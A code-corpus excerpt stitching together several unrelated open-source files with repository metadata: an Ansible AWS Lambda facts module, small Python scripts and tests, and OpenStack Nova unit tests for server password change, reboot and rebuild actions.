        merged = dict()
        for collector in (config_details, alias_details, policy_details,
                          version_details, mapping_details):
            merged.update(collector(client, module)[name])
        facts[name] = merged
    else:
        facts.update(config_details(client, module))

    return facts
def config_details(client, module):
    """
    Returns configuration details for one or all lambda functions.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    facts = dict()

    name = module.params.get('function_name')
    if name:
        # Single function: fetch its configuration directly.
        try:
            facts.update(client.get_function_configuration(FunctionName=name))
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                facts.update(function={})
            else:
                module.fail_json_aws(e, msg="Trying to get {0} configuration".format(name))
    else:
        # All functions: honour the optional pagination parameters.
        api_params = dict()
        if module.params.get('max_items'):
            api_params['MaxItems'] = module.params.get('max_items')
        if module.params.get('next_marker'):
            api_params['Marker'] = module.params.get('next_marker')
        try:
            facts.update(function_list=client.list_functions(**api_params)['Functions'])
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                facts.update(function_list=[])
            else:
                module.fail_json_aws(e, msg="Trying to get function list")

        # Re-key the listing by function name, snake_casing each entry.
        return dict((entry['FunctionName'], camel_dict_to_snake_dict(entry))
                    for entry in facts.pop('function_list', []))

    return {name: camel_dict_to_snake_dict(facts)}
def mapping_details(client, module):
    """
    Returns all lambda event source mappings.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    facts = dict()
    api_params = dict()

    name = module.params.get('function_name')
    if name:
        api_params['FunctionName'] = module.params.get('function_name')
    if module.params.get('event_source_arn'):
        api_params['EventSourceArn'] = module.params.get('event_source_arn')
    if module.params.get('max_items'):
        api_params['MaxItems'] = module.params.get('max_items')
    if module.params.get('next_marker'):
        api_params['Marker'] = module.params.get('next_marker')

    try:
        facts.update(mappings=client.list_event_source_mappings(**api_params)['EventSourceMappings'])
    except ClientError as e:
        if e.response['Error']['Code'] == 'ResourceNotFoundException':
            facts.update(mappings=[])
        else:
            module.fail_json_aws(e, msg="Trying to get source event mappings")

    # Namespace under the function name when one was given.
    if name:
        return {name: camel_dict_to_snake_dict(facts)}

    return camel_dict_to_snake_dict(facts)
def policy_details(client, module):
    """
    Returns policy attached to a lambda function.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    # Policies are not paginated.
    if module.params.get('max_items') or module.params.get('next_marker'):
        module.fail_json(msg='Cannot specify max_items nor next_marker for query=policy.')

    facts = dict()

    name = module.params.get('function_name')
    if name:
        try:
            # get_policy returns a JSON string so must convert to dict before reassigning to its key
            facts.update(policy=json.loads(client.get_policy(FunctionName=name)['Policy']))
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                facts.update(policy={})
            else:
                module.fail_json_aws(e, msg="Trying to get {0} policy".format(name))
    else:
        module.fail_json(msg='Parameter function_name required for query=policy.')

    return {name: camel_dict_to_snake_dict(facts)}
def version_details(client, module):
    """
    Returns all lambda function versions.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    facts = dict()

    name = module.params.get('function_name')
    if name:
        # Optional pagination controls.
        api_params = dict()
        if module.params.get('max_items'):
            api_params['MaxItems'] = module.params.get('max_items')
        if module.params.get('next_marker'):
            api_params['Marker'] = module.params.get('next_marker')
        try:
            facts.update(versions=client.list_versions_by_function(FunctionName=name, **api_params)['Versions'])
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                facts.update(versions=[])
            else:
                module.fail_json_aws(e, msg="Trying to get {0} versions".format(name))
    else:
        module.fail_json(msg='Parameter function_name required for query=versions.')

    return {name: camel_dict_to_snake_dict(facts)}
def main():
    """
    Main entry point.

    :return dict: ansible facts
    """
    argument_spec = dict(
        function_name=dict(required=False, default=None, aliases=['function', 'name']),
        query=dict(required=False, choices=['aliases', 'all', 'config', 'mappings', 'policy', 'versions'], default='all'),
        event_source_arn=dict(required=False, default=None)
    )

    module = AnsibleAWSModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        mutually_exclusive=[],
        required_together=[]
    )

    # validate function_name if present
    function_name = module.params['function_name']
    if function_name:
        if not re.search(r"^[\w\-:]+$", function_name):
            module.fail_json(
                msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(function_name)
            )
        if len(function_name) > 64:
            module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))

    # Build a boto3 lambda client from the standard AWS connection params.
    try:
        region, endpoint, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
        aws_connect_kwargs.update(dict(region=region,
                                       endpoint=endpoint,
                                       conn_type='client',
                                       resource='lambda'
                                       ))
        client = boto3_conn(module, **aws_connect_kwargs)
    except ClientError as e:
        module.fail_json_aws(e, "trying to set up boto connection")

    this_module = sys.modules[__name__]

    # Dispatch table: query type -> name of the fact-gathering function above.
    invocations = dict(
        aliases='alias_details',
        all='all_details',
        config='config_details',
        mappings='mapping_details',
        policy='policy_details',
        versions='version_details',
    )

    this_module_function = getattr(this_module, invocations[module.params['query']])
    all_facts = fix_return(this_module_function(client, module))

    results = dict(ansible_facts={'lambda_facts': {'function': all_facts}}, changed=False)

    if module.check_mode:
        results['msg'] = 'Check mode set but ignored for fact gathering only.'

    module.exit_json(**results)
| alxgu/ansible | lib/ansible/modules/cloud/amazon/lambda_facts.py | Python | gpl-3.0 | 13,097 | 0.003054 |
from circularbuffer import CircularBuffer
from pytest import raises
def test_index():
    """index() locates CRLF markers and raises ValueError on misses."""
    ring = CircularBuffer(32)

    # Fresh buffer holding three CRLF-terminated records.
    ring.write(b'asdf\r\njkl;\r\n1234\r\n')
    assert ring.index(b'\r\n') == 4
    assert ring.index(b'\r\n', 5) == 10
    with raises(ValueError):
        ring.index(b'x')

    # Refill (with one trailing byte) after clearing: same offsets apply,
    # and an empty needle is also rejected.
    ring.clear()
    ring.write(b'asdf\r\njkl;\r\n1234\r\na')
    assert ring.index(b'\r\n') == 4
    assert ring.index(b'\r\n', 5) == 10
    with raises(ValueError):
        ring.index(b'x')
    with raises(ValueError):
        ring.index(b'')
| dozymoe/PyCircularBuffer | tests/test_index.py | Python | mit | 527 | 0.001898 |
import rpw
from pyrevit.script import get_logger
logger = get_logger()
# Current Revit selection wrapped by revitpythonwrapper.
selection = rpw.ui.Selection()

# TODO check in only one loop
# Sum the open (unconnected) connector count over every selected element;
# a single closed loop should leave at most two ends open.
number_of_unused_connectors = sum([element.ConnectorManager.UnusedConnectors.Size for element in selection])
logger.debug(number_of_unused_connectors)

if number_of_unused_connectors > 2:
    rpw.ui.forms.Alert('Please select only one loop')

# NOTE(review): this loop's bare attribute access has no effect — it looks
# like unfinished work (matching the TODO above); confirm the intent.
for element in selection:
    element.ConnectorManager.UnusedConnectors
| CyrilWaechter/pyRevitMEP | pyRevitMEP.tab/Lab.panel/Lab.pulldown/ConvertToFlexPipe.pushbutton/script.py | Python | gpl-3.0 | 451 | 0.004435 |
from elan import *
#Set System description
#Finished
# Cycle the Viewer first so it is not running while the Configurator works.
Viewer.Start()
Viewer.CloseAndClean()

# Change the system description field, apply, and hard-restart the controller.
Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemname.Wait()
sleep(1)
Configurator.Edit.SetText(2,"Changed")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.RestartHard()
Configurator.WaitForControllerToComeBackOnline()

# Presumably verifies the change survived the restart (waits on the
# "changed" marker), then blanks the field again and cleans up.
Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemdescriptionchangedset.Wait()
Configurator.Edit.SetText(2," ")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.CloseAndClean()
print(' Finished')
#!/usr/bin/env python3
import inspect
from classes.rgams_SRS import rgams_SRS
from classes.selectorvalve_VICI import selectorvalve_VICI
from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI
from classes.pressuresensor_WIKA import pressuresensor_WIKA
from classes.pressuresensor_OMEGA import pressuresensor_OMEGA
from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM
from classes.datafile import datafile
from classes.misc import misc
# Classes whose public methods are documented in the generated LaTeX file.
CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ]

# Generate python_API.tex: one LaTeX subsection per class in CLASSES, with
# a paragraph per public method, taken from each object's docstring.
# ``with`` guarantees the file is closed even if introspection fails
# (the previous version leaked the handle on error).
with open('python_API.tex', 'w') as outfile:
    outfile.write( '%% THIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n' )

    for X in CLASSES:
        outfile.write ( '\subsubsection{Class \\texttt{' + X.__name__ + '}}\n' )

        # Path of the defining source file, shown relative to 'python'.
        P = inspect.getsourcefile(X)
        outfile.write ( '\path{' + P[P.find('python'):len(P)] + '}\par\n' )

        doc = inspect.getdoc(X)
        if doc is None:
            outfile.write ( 'No class description available.\par' )
        else:
            outfile.write ( doc + '\par' )
        outfile.write ( '\n\n' )

        for name, member in inspect.getmembers(X):
            # Skip dunder/private members; this single test also covers the
            # __doc__/__init__/__module__ checks the old code repeated.
            if name[0:2] == '__':
                continue

            outfile.write ( '\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n' )

            # getattr replaces the old exec()-built lookup: identical
            # attribute access without dynamic code execution.
            doc = getattr(X, name).__doc__
            if doc is None:
                outfile.write ( 'No method description available.\par' )
            else:
                u = ''
                for line in doc.splitlines():
                    u = u + line.lstrip() + '\\newline\n'
                outfile.write ( '\\texttt{' + u + '}' )
            outfile.write ( '\n\n' )
| brennmat/ruediPy | documentation/ruediPy/list_python_API.py | Python | gpl-3.0 | 1,842 | 0.050489 |
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy.cluster.hierarchy import dendrogram
import scipy
import json
#data = pd.read_json(path_or_buf= 'C:\Users\davtalab\Desktop\outJSON.json')
# NOTE(review): Python 2 print statement below — this script will not run
# on Python 3. The Windows path is a non-raw string ('\U', '\d' happen not
# to be escapes in Py2, but a raw string r'...' would be safer), and the
# file handle opened inline is never closed. Confirm before porting.
parsed_json = json.loads(open('C:\Users\davtalab\Desktop\data.json').read())
print parsed_json[1]['id']
| skashyap7/polar.usc.edu | html/team25ev/similarity_clustering/read_json.py | Python | apache-2.0 | 416 | 0.012019 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import uuid
import mock
import mox
from oslo.config import cfg
import webob
from nova.api.openstack.compute import servers
from nova.compute import api as compute_api
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova import exception
from nova.image import glance
from nova import objects
from nova.openstack.common import jsonutils
from nova.openstack.common import uuidutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_block_device
from nova.tests import fake_instance
from nova.tests.image import fake
from nova.tests import matchers
from nova.tests import utils
CONF = cfg.CONF
CONF.import_opt('password_length', 'nova.utils')

# Single well-known instance uuid mapped to its DB id for the stubs below.
FAKE_UUID = fakes.FAKE_UUID
INSTANCE_IDS = {FAKE_UUID: 1}
def return_server_not_found(*arg, **kwarg):
    """Stub DB lookup that always behaves as if the instance is missing."""
    raise exception.NotFound()
def instance_update_and_get_original(context, instance_uuid, values,
                                     update_cells=True,
                                     columns_to_join=None,
                                     ):
    """Stub DB update returning the same faked record as both old and new."""
    inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host')
    inst = dict(inst, **values)
    return (inst, inst)
def instance_update(context, instance_uuid, kwargs, update_cells=True):
    """Stub DB update returning a faked instance record (kwargs ignored)."""
    inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host')
    return inst
class MockSetAdminPassword(object):
    """Callable stand-in for compute_api.API.set_admin_password.

    Records the uuid of the instance and the password it was invoked with
    so tests can assert on them afterwards.
    """

    def __init__(self):
        self.instance_id = None
        self.password = None

    def __call__(self, context, instance, password):
        # Capture the call arguments for later inspection.
        self.instance_id = instance['uuid']
        self.password = password
class ServerActionsControllerTest(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v2/fake/images/%s' % image_uuid
    def setUp(self):
        """Wire up stubbed DB/network/image services and a servers controller."""
        super(ServerActionsControllerTest, self).setUp()

        # All DB lookups return an ACTIVE instance on a fake host.
        self.stubs.Set(db, 'instance_get_by_uuid',
                       fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
                                               host='fake_host'))
        self.stubs.Set(db, 'instance_update_and_get_original',
                       instance_update_and_get_original)

        fakes.stub_out_nw_api(self.stubs)
        fakes.stub_out_compute_api_snapshot(self.stubs)
        fake.stub_out_image_service(self.stubs)
        self.flags(allow_instance_snapshots=True,
                   enable_instance_password=True)
        self.uuid = FAKE_UUID
        self.url = '/v2/fake/servers/%s/action' % self.uuid
        self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6'

        # Extension manager that reports every extension as not loaded.
        class FakeExtManager(object):
            def is_loaded(self, ext):
                return False

        self.controller = servers.Controller(ext_mgr=FakeExtManager())
        self.compute_api = self.controller.compute_api
        self.context = context.RequestContext('fake', 'fake')
        self.app = fakes.wsgi_app(init_only=('servers',),
                                  fake_auth_context=self.context)
    def _make_request(self, url, body):
        """POST *body* as JSON to the servers API; return the raw response."""
        req = webob.Request.blank('/v2/fake' + url)
        req.method = 'POST'
        req.body = jsonutils.dumps(body)
        req.content_type = 'application/json'
        return req.get_response(self.app)
    def _stub_instance_get(self, uuid=None):
        """Mock compute_api.API.get to return a fresh ACTIVE instance.

        A uuid is generated when none is given; the expectation is queued
        on mox (caller must ReplayAll). Returns the instance object.
        """
        self.mox.StubOutWithMock(compute_api.API, 'get')
        if uuid is None:
            uuid = uuidutils.generate_uuid()
        instance = fake_instance.fake_db_instance(
            id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None)
        instance = objects.Instance._from_db_object(
            self.context, objects.Instance(), instance)

        self.compute_api.get(self.context, uuid,
                             want_objects=True).AndReturn(instance)
        return instance
    def _test_locked_instance(self, action, method=None, body_map=None,
                              compute_api_args_map=None):
        """Assert *action* returns 409 when the compute API reports a lock.

        The compute API call backing *action* (or *method*, when the two
        names differ) must already be stubbed by the caller; it is set to
        raise InstanceIsLocked here.
        """
        if method is None:
            method = action
        if body_map is None:
            body_map = {}
        if compute_api_args_map is None:
            compute_api_args_map = {}

        instance = self._stub_instance_get()
        args, kwargs = compute_api_args_map.get(action, ((), {}))

        getattr(compute_api.API, method)(self.context, instance,
                                         *args, **kwargs).AndRaise(
            exception.InstanceIsLocked(instance_uuid=instance['uuid']))

        self.mox.ReplayAll()

        res = self._make_request('/servers/%s/action' % instance['uuid'],
                                 {action: body_map.get(action)})
        self.assertEqual(409, res.status_int)
        # Do these here instead of tearDown because this method is called
        # more than once for the same test case
        self.mox.VerifyAll()
        self.mox.UnsetStubs()
    def test_actions_with_locked_instance(self):
        """Every server action yields 409 Conflict on a locked instance."""
        actions = ['resize', 'confirmResize', 'revertResize', 'reboot',
                   'rebuild']

        # Actions whose compute API method name differs from the action name.
        method_translations = {'confirmResize': 'confirm_resize',
                               'revertResize': 'revert_resize'}

        body_map = {'resize': {'flavorRef': '2'},
                    'reboot': {'type': 'HARD'},
                    'rebuild': {'imageRef': self.image_uuid,
                                'adminPass': 'TNc53Dr8s7vw'}}
        args_map = {'resize': (('2'), {}),
                    'confirmResize': ((), {}),
                    'reboot': (('HARD',), {}),
                    'rebuild': ((self.image_uuid, 'TNc53Dr8s7vw'),
                                {'files_to_inject': None})}

        for action in actions:
            method = method_translations.get(action)
            self.mox.StubOutWithMock(compute_api.API, method or action)
            self._test_locked_instance(action, method=method,
                                       body_map=body_map,
                                       compute_api_args_map=args_map)
    def test_server_change_password(self):
        """changePassword delegates to set_admin_password with the new pass."""
        mock_method = MockSetAdminPassword()
        self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
        body = {'changePassword': {'adminPass': '1234pass'}}

        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_change_password(req, FAKE_UUID, body)

        self.assertEqual(mock_method.instance_id, self.uuid)
        self.assertEqual(mock_method.password, '1234pass')
    def test_server_change_password_pass_disabled(self):
        """Password is still set even when hidden from API responses."""
        # run with enable_instance_password disabled to verify adminPass
        # is missing from response. See lp bug 921814
        self.flags(enable_instance_password=False)

        mock_method = MockSetAdminPassword()
        self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
        body = {'changePassword': {'adminPass': '1234pass'}}

        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_change_password(req, FAKE_UUID, body)

        self.assertEqual(mock_method.instance_id, self.uuid)
        # note,the mock still contains the password.
        self.assertEqual(mock_method.password, '1234pass')
    def test_server_change_password_not_a_string(self):
        """A non-string adminPass is rejected with 400 Bad Request."""
        body = {'changePassword': {'adminPass': 1234}}
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_change_password,
                          req, FAKE_UUID, body)
    def test_server_change_password_bad_request(self):
        """A body missing the adminPass key is rejected with 400."""
        body = {'changePassword': {'pass': '12345'}}
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_change_password,
                          req, FAKE_UUID, body)
    def test_server_change_password_empty_string(self):
        """An empty-string password is accepted and passed through as-is."""
        mock_method = MockSetAdminPassword()
        self.stubs.Set(compute_api.API, 'set_admin_password', mock_method)
        body = {'changePassword': {'adminPass': ''}}

        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_change_password(req, FAKE_UUID, body)

        self.assertEqual(mock_method.instance_id, self.uuid)
        self.assertEqual(mock_method.password, '')
    def test_server_change_password_none(self):
        """A null adminPass is rejected with 400 Bad Request."""
        body = {'changePassword': {'adminPass': None}}
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_change_password,
                          req, FAKE_UUID, body)
    def test_reboot_hard(self):
        """A HARD reboot request on an active instance succeeds."""
        body = dict(reboot=dict(type="HARD"))
        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_reboot(req, FAKE_UUID, body)
    def test_reboot_soft(self):
        """A SOFT reboot request on an active instance succeeds."""
        body = dict(reboot=dict(type="SOFT"))
        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_reboot(req, FAKE_UUID, body)
    def test_reboot_incorrect_type(self):
        """An unknown reboot type is rejected with 400 Bad Request."""
        body = dict(reboot=dict(type="NOT_A_TYPE"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_reboot,
                          req, FAKE_UUID, body)
    def test_reboot_missing_type(self):
        """A reboot request without a type is rejected with 400."""
        body = dict(reboot=dict())
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_reboot,
                          req, FAKE_UUID, body)
    def test_reboot_none(self):
        """A null reboot type is rejected with 400 Bad Request."""
        body = dict(reboot=dict(type=None))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_reboot,
                          req, FAKE_UUID, body)
    def test_reboot_not_found(self):
        """Rebooting a nonexistent instance yields 404 Not Found."""
        self.stubs.Set(db, 'instance_get_by_uuid',
                       return_server_not_found)

        body = dict(reboot=dict(type="HARD"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller._action_reboot,
                          req, str(uuid.uuid4()), body)
    def test_reboot_raises_conflict_on_invalid_state(self):
        """409 Conflict when the compute layer rejects the instance state."""
        body = dict(reboot=dict(type="HARD"))

        def fake_reboot(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                state='fake_state', method='fake_method',
                instance_uuid='fake')

        self.stubs.Set(compute_api.API, 'reboot', fake_reboot)

        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_reboot,
                          req, FAKE_UUID, body)
def test_reboot_soft_with_soft_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
req, FAKE_UUID, body)
def test_reboot_hard_with_soft_in_progress_does_not_raise(self):
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.controller._action_reboot(req, FAKE_UUID, body)
def test_reboot_hard_with_hard_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="HARD"))
req = fakes.HTTPRequest.blank(self.url)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
req, FAKE_UUID, body)
    def test_rebuild_preserve_ephemeral_is_ignored_when_ext_not_loaded(self):
        """preserve_ephemeral in the body is dropped from the compute-api
        call when the os-preserve-ephemeral-rebuild extension is not loaded.
        """
        return_server = fakes.fake_instance_get(image_ref='2',
                                                vm_state=vm_states.ACTIVE,
                                                host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "preserve_ephemeral": False,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        context = req.environ['nova.context']
        # mox expectation: rebuild called WITHOUT preserve_ephemeral.
        self.mox.StubOutWithMock(compute_api.API, 'rebuild')
        compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
                                mox.IgnoreArg(), files_to_inject=None)
        self.mox.ReplayAll()
        self.controller._action_rebuild(req, FAKE_UUID, body)
    def _test_rebuild_preserve_ephemeral(self, value=None):
        """Helper: with the extension loaded, preserve_ephemeral is passed
        through to compute-api rebuild iff it appears in the request body.
        """
        def fake_is_loaded(ext):
            return ext == 'os-preserve-ephemeral-rebuild'
        self.stubs.Set(self.controller.ext_mgr, 'is_loaded', fake_is_loaded)
        return_server = fakes.fake_instance_get(image_ref='2',
                                                vm_state=vm_states.ACTIVE,
                                                host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        if value is not None:
            body['rebuild']['preserve_ephemeral'] = value
        req = fakes.HTTPRequest.blank(self.url)
        context = req.environ['nova.context']
        self.mox.StubOutWithMock(compute_api.API, 'rebuild')
        if value is not None:
            compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
                                    mox.IgnoreArg(), preserve_ephemeral=value,
                                    files_to_inject=None)
        else:
            compute_api.API.rebuild(context, mox.IgnoreArg(), self._image_href,
                                    mox.IgnoreArg(), files_to_inject=None)
        self.mox.ReplayAll()
        self.controller._action_rebuild(req, FAKE_UUID, body)
    def test_rebuild_preserve_ephemeral_true(self):
        """preserve_ephemeral=True is forwarded to compute-api."""
        self._test_rebuild_preserve_ephemeral(True)
    def test_rebuild_preserve_ephemeral_false(self):
        """preserve_ephemeral=False is forwarded to compute-api."""
        self._test_rebuild_preserve_ephemeral(False)
    def test_rebuild_preserve_ephemeral_default(self):
        """Omitting preserve_ephemeral omits it from the compute call."""
        self._test_rebuild_preserve_ephemeral()
    def test_rebuild_accepted_minimum(self):
        """A minimal rebuild body succeeds; response carries the image id,
        a generated adminPass of the configured length, and a location
        header pointing at the server.
        """
        return_server = fakes.fake_instance_get(image_ref='2',
                vm_state=vm_states.ACTIVE, host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        self_href = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        robj = self.controller._action_rebuild(req, FAKE_UUID, body)
        body = robj.obj
        self.assertEqual(body['server']['image']['id'], '2')
        self.assertEqual(len(body['server']['adminPass']),
                         CONF.password_length)
        self.assertEqual(robj['location'], self_href)
    def test_rebuild_instance_with_image_uuid(self):
        """A bare image uuid in imageRef is passed to rebuild unchanged."""
        info = dict(image_href_in_call=None)
        def rebuild(self2, context, instance, image_href, *args, **kwargs):
            info['image_href_in_call'] = image_href
        self.stubs.Set(db, 'instance_get',
                       fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
        self.stubs.Set(compute_api.API, 'rebuild', rebuild)
        # proper local hrefs must start with 'http://localhost/v2/'
        body = {
            'rebuild': {
                'imageRef': self.image_uuid,
            },
        }
        req = fakes.HTTPRequest.blank('/v2/fake/servers/a/action')
        self.controller._action_rebuild(req, FAKE_UUID, body)
        self.assertEqual(info['image_href_in_call'], self.image_uuid)
    def test_rebuild_instance_with_image_href_uses_uuid(self):
        """A full image href is reduced to its uuid before rebuild."""
        info = dict(image_href_in_call=None)
        def rebuild(self2, context, instance, image_href, *args, **kwargs):
            info['image_href_in_call'] = image_href
        self.stubs.Set(db, 'instance_get',
                       fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
        self.stubs.Set(compute_api.API, 'rebuild', rebuild)
        # proper local hrefs must start with 'http://localhost/v2/'
        body = {
            'rebuild': {
                'imageRef': self.image_href,
            },
        }
        req = fakes.HTTPRequest.blank('/v2/fake/servers/a/action')
        self.controller._action_rebuild(req, FAKE_UUID, body)
        self.assertEqual(info['image_href_in_call'], self.image_uuid)
    def test_rebuild_accepted_minimum_pass_disabled(self):
        # run with enable_instance_password disabled to verify adminPass
        # is missing from response. See lp bug 921814
        self.flags(enable_instance_password=False)
        return_server = fakes.fake_instance_get(image_ref='2',
                vm_state=vm_states.ACTIVE, host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        self_href = 'http://localhost/v2/fake/servers/%s' % FAKE_UUID
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        robj = self.controller._action_rebuild(req, FAKE_UUID, body)
        body = robj.obj
        self.assertEqual(body['server']['image']['id'], '2')
        self.assertNotIn("adminPass", body['server'])
        self.assertEqual(robj['location'], self_href)
    def test_rebuild_raises_conflict_on_invalid_state(self):
        """InstanceInvalidState from rebuild maps to HTTP 409."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        def fake_rebuild(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                    state='fake_state', method='fake_method',
                    instance_uuid='fake')
        self.stubs.Set(compute_api.API, 'rebuild', fake_rebuild)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_accepted_with_metadata(self):
        """Metadata supplied in the rebuild body appears in the response."""
        metadata = {'new': 'metadata'}
        return_server = fakes.fake_instance_get(metadata=metadata,
                vm_state=vm_states.ACTIVE, host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "metadata": metadata,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
        self.assertEqual(body['server']['metadata'], metadata)
    def test_rebuild_accepted_with_bad_metadata(self):
        """Non-dict metadata is rejected with HTTP 400."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "metadata": "stack",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_with_too_large_metadata(self):
        """A metadata key over the size limit maps to HTTP 413."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "metadata": {
                   256 * "k": "value"
                }
            }
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
                          self.controller._action_rebuild, req,
                          FAKE_UUID, body)
    def test_rebuild_bad_entity(self):
        """A rebuild body missing imageRef (imageId given) -> HTTP 400."""
        body = {
            "rebuild": {
                "imageId": self._image_href,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_bad_personality(self):
        """Personality contents that are not valid base64 -> HTTP 400."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "personality": [{
                    "path": "/path/to/file",
                    "contents": "INVALID b64",
                }]
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_personality(self):
        """Valid personality files are accepted and not echoed back."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "personality": [{
                    "path": "/path/to/file",
                    "contents": base64.b64encode("Test String"),
                }]
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
